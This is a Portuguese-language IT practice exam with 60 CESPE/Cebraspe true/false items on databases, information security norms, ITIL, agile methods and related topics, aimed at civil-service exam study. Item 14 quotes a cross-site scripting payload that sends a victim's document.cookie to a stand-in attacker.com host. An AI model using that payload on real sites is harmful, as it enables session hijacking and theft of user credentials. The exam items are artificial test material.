Buscar

simulado tecnologia da informação 02

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 3, do total de 53 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 6, do total de 53 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes
Você viu 9, do total de 53 páginas

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Prévia do material em texto

Simulado
Criado em: 17/02/2021 às 10:54:56
Acerca das tarefas de mineração de dados, julgue os itens a seguir.
1. [Q1487808] Utilizamos a tarefa de classificação quando queremos descobrir o valor futuro de
determinado atributo.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 6º Simulado / Questão: 123
2. [Q1487810] A tarefa de associação consiste em identificar quais atributos estão relacionados
dentro dos dados analisados.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 6º Simulado / Questão: 125
Segundo os conceitos de data warehouse e data mart, julgue o item a seguir.
3. [Q1487723] Um data warehouse é usado como repositório de dados centralizados para fins
transacionais, gravação e operações diárias das organizações.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Warehouse.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 6º Simulado / Questão: 38
Acerca dos operadores relacionais e álgebra relacional, julgue o item a seguir.
4. [Q1487720] A operação de projeção resultará em uma nova relação que contenha todas as
tuplas que pertençam à primeira relação, e não pertençam à segunda.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Algoritmos.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Tribunal de Contas do Rio de Janeiro TCE - RJ / Analista de Controle Externo - Área:
Controle Externo - 6º Simulado / Questão: 35
Com relação às informações contidas no modelo conceitual precedente, julgue os próximos itens.
5. [Q1480998] Todos os serviços, independentemente do tipo de cada um deles, são tributados
por todos os países.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 104
Considerando a norma ISO/IEC 27005, julgue os itens a seguir, no que se refere ao alinhamento
entre o processo de gestão de riscos da segurança da informação e o sistema de gestão da
segurança da informação (SGSI).
6. [Q1480973] A implementação do plano de tratamento de riscos está alinhada com a fase agir
do SGSI.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de
segurança da informação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 94
Acerca da gestão de riscos da segurança da informação, julgue os itens subsecutivos, com base na
norma ISO/IEC 27005.
7. [Q1480960] Os responsáveis pela gestão de riscos na organização são os próprios donos dos
ativos ou os responsáveis pelos contextos ou escopo da gestão de riscos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de
segurança da informação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 89
8. [Q1480966] O processo de tratamento de riscos deve ter como entrada uma lista dos riscos
classificados por prioridade de tratamento.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de
segurança da informação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 92
Acerca das técnicas utilizadas na análise de negócios, julgue os itens a seguir.
9. [Q1480923] A técnica análise de gaps (gap analysis) é utilizada para a análise comparativa
entre o estado atual de uma organização e o estado futuro que se pretende alcançar, a fim de
identificar as diferenças a serem abordadas entre os estados.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 75
10. [Q1480927] O conceito essencial (ou core concept) do modelo de análise de negócios é
formado por seis componentes: mudança, necessidade, solução, contexto, stakeholder e valor.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Governança e Gestão de TI.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 76
Julgue os itens subsequentes, referentes a processo de desenvolvimento de software, CMMI-DEV,
MPS.BR, Scrum e programação ágil.
11. [Q1480896] Os modelos ágeis de desenvolvimento de software dão grande ênfase às
definições de atividades e aos processos e pouca ênfase à pragmática e ao fator humano.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > CMMI e MPS-BR.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Gestão de Projetos / Questão: 67
Acerca da Lei Geral de Proteção de Dados Pessoais (LGPD) e suas alterações, julgue os itens que se
seguem.
12. [Q1480785] Entre os fundamentos que disciplinam a proteção de dados pessoais no Brasil,
estão o respeito à privacidade, a autodeterminação informativa e a liberdade de expressão, de
informação, de comunicação e de opinião.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de
segurança da informação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Segurança da Informação e Proteção de Dados /
Questão: 118
13. [Q1480789] Os dados pessoais serão eliminados após o término de seu tratamento, sendo
autorizada a sua conservação para a finalidade de estudo por órgão de pesquisa, sendo garantida,
sempre que possível, a anonimização desses dados.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27000 - Sistemas de gerenciamento de
segurança da informação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Segurança da Informação e Proteção de Dados /
Questão: 120
Acerca de técnicas de ataque e tipos de vulnerabilidades, julgue os itens a seguir.
14. [Q1480682] Considere que uma aplicação use a seguinte informação não confiável na
construção do HTML, sem validação ou escaping.(String) page += ""; "<input
name='creditcard'type='TEXT' value='" + request.getParameter ("CC") + "'>";Considere, ainda,
que um atacante tenha alterado o parâmetro CC no browser pelo código a
seguir><script>document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?
foo='+document.cookie</script>Nesse caso, o risco de segurança da aplicação é a desserialização
insegura.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > HTML.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Segurança da Informação e Proteção de Dados /
Questão: 69
Acerca da conteinerização de aplicações e DevOps, julgue os itens subsequentes.
15. [Q1480529] Um contêiner é definido como um sistema operacional completo, incluindo-se o
kernel e um conjunto de aplicações.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Técnicas de Teste de Software.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 110
16. [Q1480539] DevOps permite que os desenvolvedores aumentem a sua produtividade.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Servidor.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestruturade Tecnologia da Informação (TI) /
Questão: 114
Acerca de PostgreSQL, julgue os itens a seguir.
17. [Q1480500] O arquivo pg_hba.conf controla a autenticação de usuários e hosts, de acordo
com a sua origem; quando o parâmetro trust é utilizado na opção auth-metod, são aceitas conexões
desde que o usuário se autentique usando senha.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Postgree Sql .
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 99
Com relação ao sistema gerenciador de banco de dados Oracle, julgue os próximos itens.
18. [Q1480485] Um banco de dados executado em modo de ARCHIVELOG permite que arquivos
de redo log atualizem, em tempo real, banco de dados em formato active.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Oracle.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 95
<?xml version="1.0" encoding="UTF-8"?>
<module xmlns="urn:jboss:module:1.0"
name="com.mysql">
<Resources>
<Resource-root path="mysql-connector
java-5.1.15.jar"/>
</resources>
<dependencies>
<module name="javax.api"/>
<module name="javax.transaction.api"/>
</dependencies>
</module>
Tendo como referência inicial o conteúdo do arquivo de nome module.xml do JBoss, apresentado
acima, julgue os itens subsequentes.
19. [Q1480465] EAP_HOME/conf é o diretório padrão dos módulos; para que seja possível
pesquisar em diretórios diferentes, o novo diretório deve ser configurado na variável JBOSS_PATH.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > XML.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 87
Acerca do servidor de aplicações JBoss, julgue os itens seguintes.
20. [Q1480455] O arquivo de configuração host-master.xml deve ser utilizado para configurar os
detalhes necessários para o funcionamento de um servidor em formato standalone.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Beans (JavaBeans, EJB, ManagedBeans, etc).
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 83
Julgue os próximos itens, a respeito de arquitetura em nuvem e virtualização.
21. [Q1480449] Considere que um provedor de serviço de infraestrutura disponibilize recursos
para seus usuários, que podem fazer uso em formato multi-tenant e têm flexibilidade para
aumentar e diminuir rapidamente o uso de recursos. Nessa situação, a infraestrutura tem
características de uma nuvem computacional.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Computação em nuvem.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 80
22. [Q1480450] O consumo compartilhado de cinco aplicações em um servidor físico que utiliza
controles de um servidor de aplicações para manter a disponibilidade de cada aplicação com
configurações distintas caracteriza o uso de virtualização.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Virtualização.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 81
Julgue os itens seguintes, relativos a redes de computadores.
23. [Q1480412] Com o recurso multipath iSCSI, é possível configurar várias rotas entre um
servidor e seus dispositivos de armazenamento, o que permite tanto equilibrar a carga de tráfego
quanto prover failover.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 66
Julgue os próximos itens, a respeito do Windows Server 2016 e do RedHat Enterprise Linux 7.
24. [Q1480400] Considere que se deseje criar uma área de trabalho virtual (virtual desktop
infrastructure — VDI) utilizando-se diferentes sistemas operacionais na mesma máquina física, com
vistas a validar a segurança dos dados nesses sistemas operacionais e aplicativos. Nessa situação,
para que se atinja o objetivo desejado, é adequado criar, por meio do Microsoft Hyper-V Server
2016, máquinas virtuais com sistemas operacionais distintos, blindadas e de inicialização segura
para realizar testes contra malware e outros acessos não autorizados nas máquinas virtuais.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Ferramentas de Virtualização (Hypervisores, VMWare,
Hyper-V etc.).
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 59
Julgue os próximos itens, relativos a sistemas operacionais.
25. [Q1480390] Embora o processo deva estar na memória para ser executado, ele pode ser
transferido temporariamente da memória principal para uma memória de retaguarda, como um
disco, por exemplo, caso se faça necessário realizar um swapping devido a uma alteração nos
requisitos da memória que tenha sobrecarregado a memória disponível, que precisa ser liberada.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gerência de memória.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 54
26. [Q1480391] Na alocação de memória contígua, utiliza-se a segmentação de área de memória,
de modo que a paginação não seja fragmentada, ou seja, cada processo fica contido em uma única
seção da memória, contígua à seção que contém o próximo processo.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Gerência de memória.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Infraestrutura de Tecnologia da Informação (TI) /
Questão: 55
Julgue os seguintes itens, considerando a ITIL 4.
27. [Q1480380] Não há prática específica para gestão de riscos, sendo o gerenciamento de riscos
realizado pela prática gerenciamento da segurança.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ITIL.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 112
28. [Q1480383] Na ITIL 4, o gerenciamento de incidentes e o gerenciamento de problemas foram
unidos em uma única prática que visa restaurar a operação normal do serviço o mais rapidamente
possível, juntamente com a descoberta da causa raiz do problema.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ITIL.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 114
As informações a seguir são relativas a uma mensuração de sistemas em pontos de função.
I manutenção de sete páginas HTML estáticas no portal da organização, contida em um projeto de
desenvolvimento
II manutenção na interface, especificamente de logotipos, e mudança de botões da aplicação, que
totalizam nove pontos de função transacionais impactados
III criação de identidade visual para dez páginas do portal associadas à área de comunicação social
da organização
A seguinte tabela mostra a quantidade de itens obtida na contagem para o projeto de
desenvolvimento.
função
complexidade
quantidade
consultas externas (CE)
baixa
3
arquivos de interface externa (AIE)
média
1
entradas externas (EE)
alta
2
arquivos lógicos internos (ALI)
alta
3
Tendo como referência as informações precedentes, julgue os próximos itens, de acordo com o
roteiro de métricas de software do SISP (versão 2.1).
29. [Q1480363] De acordo com os dados da tabela apresentada, as funções transacionais
representam 21 pontos de função.c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > HTML.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 101
Considerando as linguagens de programação Java (versão 8 ou superior) e PHP (versão 7 ou
superior), julgue os próximos itens.
30. [Q1480315] Uma expressão lambda é usada principalmente para definir a implementação
procedural de uma interface associativa.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Java.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 94
A respeito de OLTP e OLAP, julgue os itens a seguir.
31. [Q1480270] A operação de ROLLUP consiste em selecionar valores específicos para os
atributos, que são exibidos em uma tabulação cruzada para um maior detalhamento
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > OLAP.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 86
Julgue os itens seguintes, a respeito de web services.
32. [Q1480257] Os web services estão vinculados a uma linguagem de programação específica.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 79
33. [Q1480258] Os serviços Web SOAP, executados no protocolo SOAP, utilizam a tecnologia
XML para troca de mensagens.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > REST/SOAP.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 80
No que se refere a análise de negócios, julgue os itens que se seguem.
34. [Q1480255] Elicitar requisitos não inclui somente necessidades dos usuários, mas também
extrair informações que surgem de padrões organizacionais, governamentais e industriais em
geral, para atender necessidades.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Redes de computadores.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 78
Com relação a ferramentas de controle de versão SVN e GIT, julgue os próximos itens.
35. [Q1480252] No SVN, o comando UPDATE é usado para copiar todas as mudanças do local de
trabalho do usuário para o repositório, com um único comando.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 76
Pessoa
- nome: string
- idade: int
- sexo: char
- endereço: varchar
Tendo como referência as informações precedentes, julgue os itens a seguir, com base na orientação
a objetos.
36. [Q1480244] Pessoa é considerado um nome de classe.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > PHP.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 72
Julgue os itens seguintes, a respeito de programação ágil com XP (extreme programming).
37. [Q1480228] O refactoring de código não faz parte do modelo XP, visto que a expectativa é a
entrega ágil, e não deve ser considerada em tempo de projeto a recriação de código para
aprimoramento.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 63
38. [Q1480232] Grandes quantidades de horas extras são aceitáveis em médio e longo prazo,
para agilizar a entrega de requisitos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 65
Acerca de CMMI, julgue os itens subsecutivos.
39. [Q1480223] Programas de treinamento são estabelecidos para desenvolver habilidades
técnicas e conhecimentos dos membros das equipes a partir do nível 2.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > CMMI e MPS-BR.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 60
Com relação à MPS.BR, julgue os itens subsequentes.
40. [Q1480220] Auditorias de configuração devem ser executadas em caráter opcional para fins
de controle, visto que não fazem parte do resultado esperado do processo de gerência de
configuração.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > CMMI e MPS-BR.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Desenvolvimento de Software / Questão: 58
Julgue os itens a seguir, relativos a conceitos de modelagem dimensional.
41. [Q1479973] Em um processo de modelagem dimensional, a operação de merge/pruge agrega
informações das dimensões para diminuir a tabela de fatos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Bancos de Dados Dimensionais.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 100
Julgue os itens a seguir, a respeito de banco de dados relacionais.
42. [Q1479935] No modelo entidade relacionamento, as entidades representam um objeto do
mundo real e o relacionamento entre esses objetos.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 76
43. [Q1479937] O processo de normalização de dados consiste em encontrar informações que
atinjam um plano de normalização com as informações constantes nas tuplas adjacentes.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 77
44. [Q1479940] Em um banco de dados relacional, a chave candidata a primária é formada por
um ou mais atributos que identificam uma única tupla.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 79
45. [Q1479946] Chaves estrangeiras não podem ser nulas e cada registro na tabela deve possuir
uma, e somente uma, chave estrangeira.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Banco de Dados.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 83
Julgue os seguintes itens, a respeito de big data.
46. [Q1479931] Tratando-se de aprendizagem de máquina, o fator de confiança para as
evidências varia de -1 a 1 para representar a certeza do fato.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Big Data.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 72
No que se refere à mineração de dados, julgue os itens a seguir.
47. [Q1479924] O objetivo da etapa de pré-processamento é diminuir a quantidade de dados que
serão analisados, por meio da aplicação de filtros e de eliminadores de palavras.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Mining.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 67
A respeito de dados, informação, conhecimento e inteligência, julgue os próximos itens.
48. [Q1479906] A migração do armazenamento de dados para nuvem pode ser feita por meio da
replicação de servidores, caso em que os dados são replicados entre um servidor local e um
servidor na nuvem.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados:Tecnologia da Informação > Data Warehouse.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 55
49. [Q1479908] Em organizações públicas e privadas, o plano de continuidade de negócio deve
garantir a segurança e a integridade dos dados armazenados.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Data Warehouse.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Ciência de Dados / Questão: 57
No que diz respeito ao escritório de processos, julgue os seguintes itens.
50. [Q1479803] O escritório de processos é responsável pelo desenho, pelo desenvolvimento e
pela execução de um processo.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Dados .
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Análise de Processos de Negócios / Questão: 82
Com relação à notação BPMN, julgue os itens subsequentes.
51. [Q1479791] Na representação de um fluxograma, a presença de uma seta que é proveniente
de um símbolo e que aponta para outro símbolo indica que o controle do processo foi passado para
o símbolo do qual provém a seta.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > BPMN - Business Process Model and Notation.
Fonte: CESPE/CEBRASPE 2020 / Ministério da Economia - BR / Especialista em Análise de Processos de Negócios / Questão: 73
Julgue o item a seguir, a respeito da linguagem de programação R.
52. [Q1471202] A função plot é utilizada para plotar gráficos. O comando plot(c(1,2,3), c(3,2,1))
irá plotar o gráfico a seguir:
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Programação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Polícia Civil do Distrito Federal PCDF - DF / Agente de Polícia Civil - 17º Simulado
pós-edital / Questão: 103
Julgue os itens a seguir, com base nas normas ABNT NBR ISSO/ IEC 27001:2013, 27002:2013,
27005:2011 e 15999.
53. [Q1412045] De acordo com a ISO 27002:2013, o gerenciamento seguro de chaves secretas e
privadas se torna suficiente, não sendo necessário considerar a autenticidade de chaves públicas e
privadas, uma vez que chaves autoassinadas já garantem o requerido nível de confiança.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ABNT NBR ISO 27002 - Diretrizes para gestão de
segurança da informação.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 56
Sobre a ISO 12207, julgue os itens a seguir:
54. [Q1412037] Uma das regras fundamentais de identificação, escopo e estruturação dos
processos, é que não convém que cada processo tenha uma estrutura interna definida para que
possa ser executável, basta esse processo estar de acordo com um bom escopo.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Governança e Gestão de TI.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 50
Sobre qualidade de software, julgue os itens a seguir:
55. [Q1412027] Pode-se ter como exemplos de métricas de controle ou de processo, Qualidade,
Eficiência e Manutenibilidade.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Qualidade de Software.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 45
56. [Q1411941] A respeito dos conceitos de modelagem de dados, julgue o item a seguir. O
modelo conceitual representa o mais alto nível da estrutura de um banco de dados, sendo
responsável por representar as relações entre as diversas áreas que serão abordadas no banco de
dados. Não há necessidade de explorar detalhes sobre a implementação, sendo o foco no ponto de
vista do usuário.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Modelagem de dados.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 3
57. [Q1411963] A respeito dos conceitos de análise de dados, julgue o item a seguir. A análise de
dados é um conjunto de procedimentos para analisar dados, técnicas para interpretar esses
resultados, resumir e organizar os dados coletados para interpretação dos dados. A análise
exploratória de dados consiste na elaboração de um modelo preditivo, prevendo acontecimentos
futuros com base na análise dos dados atuais.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Desenvolvimento de Sistemas.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 8
58. [Q1411974] Segundo a Instrução Normativa n. 1, de 4 de abril de 2019, a Equipe de
Fiscalização é composta por Fiscal Requisitante, Fiscal Técnico e Fiscal Administrativo.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > Normativos sobre Governança Digital no Setor Público.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 14
59. [Q1411997] Os silos organizacionais são um dos maiores desafios que uma organização pode
enfrentar ao tentar trabalhar de forma eficaz e eficiente com uma visão compartilhada, ou tornar-
se mais ágil e resiliente. O SVS é utilizado pela ITIL 4 como solução para os silos, descrevendo
como todos os componentes e atividades da organização trabalham juntos como um sistema para
habilitar a criação de valor.
c) Certo
e) Errado
Disciplinas/Assuntos vinculados: Tecnologia da Informação > ITIL.
Fonte: CESPE/Cebraspe (Questões Inéditas) 2020 / Prefeitura de Aracaju - SE / Auditor de Tributos Municipais - Área: Tecnologia da
Informação 1º Simulado / Questão: 24
60. [Q1412002] O Cobit 2019 manteve os mesmos princípios para criação de valor, que são:
Realização de benefícios, Otimização de recursos e Gestão de riscos. Porém, devido à importância
no uso de informações e tecnologia, fez questão de diferenciar o conceito de I&T e TI, da seguinte
forma: TI: usado pela área organizacional, responsável pela tecnologia; I&T: todas as informações
que a organização cria, processa e utiliza para atingir seus objetivos, fazendo uso da tecnologia
para suportar.
c) Certo
e) Errado
